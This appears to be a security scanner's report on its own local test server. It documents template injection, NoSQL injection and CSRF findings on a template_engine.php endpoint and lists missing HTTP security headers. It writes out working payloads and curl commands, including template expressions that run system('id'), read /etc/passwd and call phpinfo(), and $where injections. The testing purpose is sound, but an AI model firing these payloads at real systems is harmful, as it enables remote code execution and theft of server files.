| # | Parameter | Sink | Risk | CVSS | Confidence | Exploit. | Impact | Location |
|---|---|---|---|---|---|---|---|---|
| 1 | body |
🔍 SSTI | Critical | 9.8 CRITICAL | Confirmed | Chained | RCE | POST JSON body (php://input) at /save |
| 2 | filter |
🔍 NOSQL_INJECTION | High | 9.8 CRITICAL | High | Direct | RCE | POST JSON body (php://input) at /save |
| 3 | action |
🎭 CSRF | Medium | 8.1 HIGH | Confirmed | Direct | SESSION_THEFT | GET query string |
curl -i -X POST 'template_engine.php/save' --data 'JSONBODY:{"body":"{{phpinfo()}}","filter":""}'{"status":"template_saved"}| Result | Method | URL | Payload | Status | Time | Detection | DB |
|---|---|---|---|---|---|---|---|
| ⚠ VULN | POST |
template_engine.php/save |
JSONBODY:{"body":"ggsec{{7*7}}","filter":""} |
200 | 21ms | indicator | — |
| ⚠ VULN | POST |
template_engine.php/save |
JSONBODY:{"body":"{{system('id')}}","filter":""} |
200 | 20ms | indicator | — |
| ⚠ VULN | POST |
template_engine.php/save |
JSONBODY:{"body":"{{system('cat /etc/passwd')}}","filter":""} |
200 | 20ms | indicator | — |
| ⚠ VULN | POST |
template_engine.php/save |
JSONBODY:{"body":"{{phpinfo()}}","filter":""} |
200 | 2ms | indicator | — |
| ⚠ VULN | POST |
template_engine.php/save |
JSONBODY:{"body":"{{file_get_contents('/etc/passwd')}}","filter":""} |
200 | 21ms | indicator | — |
| ⚠ VULN | GET (2nd-order) |
template_engine.php?action=admin_render |
trigger_render |
200 | 15ms | ssti-second-order | — |
| ⚠ VULN | GET (2nd-order) |
template_engine.php?action=admin_render |
trigger_render_rce |
200 | 8ms | ssti-rce-eval | — |
curl -i -X POST 'http://localhost/template_engine.php/save' --data 'JSONBODY:{"body":"","filter":{"$where":"1==1"}}'{"status":"template_saved"}| Result | Method | URL | Payload | Status | Time | Detection | DB |
|---|---|---|---|---|---|---|---|
| ⚠ VULN | POST |
http://localhost/template_engine.php/save |
JSONBODY:{"body":"","filter":{"$where":"var s=Date.now();while(Date.now()-s<5000){};return true;"}} |
200 | 4054ms | nosql-time-based | — |
| ⚠ VULN | POST |
http://localhost/template_engine.php/save |
JSONBODY:{"body":"","filter":{"$where":"sleep(5000)"}} |
200 | 4054ms | nosql-time-based | — |
| ⚠ VULN | POST |
http://localhost/template_engine.php/save |
JSONBODY:{"body":"","filter":{"$where":"1==1"}} |
200 | 4054ms | nosql-time-based | — |
curl -i '/?action=login'
<!DOCTYPE html> <html> <head><title>GGSec Test Server</title></head> <body> <h1>GGSec Scanner Test Environment</h1> <ul> <li><a href="/login2.php">Login Test</a></li> <li><a href="/profile.php">Profile Test</a></li> <li><a href="/deserialize_test.php?data=Tzo0OiJVc2Vy…
| Result | Method | URL | Payload | Status | Time | Detection | DB |
|---|---|---|---|---|---|---|---|
| ⚠ VULN | GET |
/?action=login |
/?action=login |
200 | 3ms | csrf-no-token | — |
| Header | Status | Risk | Recommendation |
|---|---|---|---|
Content-Security-Policy |
✗ MISSING | HIGH | Prevents XSS/injection. Use nonce or strict-dynamic. |
X-Frame-Options |
✗ MISSING | MEDIUM | Prevents clickjacking. Use DENY or SAMEORIGIN. |
X-Content-Type-Options |
✗ MISSING | LOW | Prevents MIME sniffing. Set to nosniff. |
Strict-Transport-Security |
✗ MISSING | MEDIUM | Enforces HTTPS. min-age=31536000; includeSubDomains. |
Referrer-Policy |
✗ MISSING | LOW | Limits referrer leakage. strict-origin-when-cross-origin. |
Permissions-Policy |
✗ MISSING | LOW | Restrict unused browser features (camera, mic, geo). |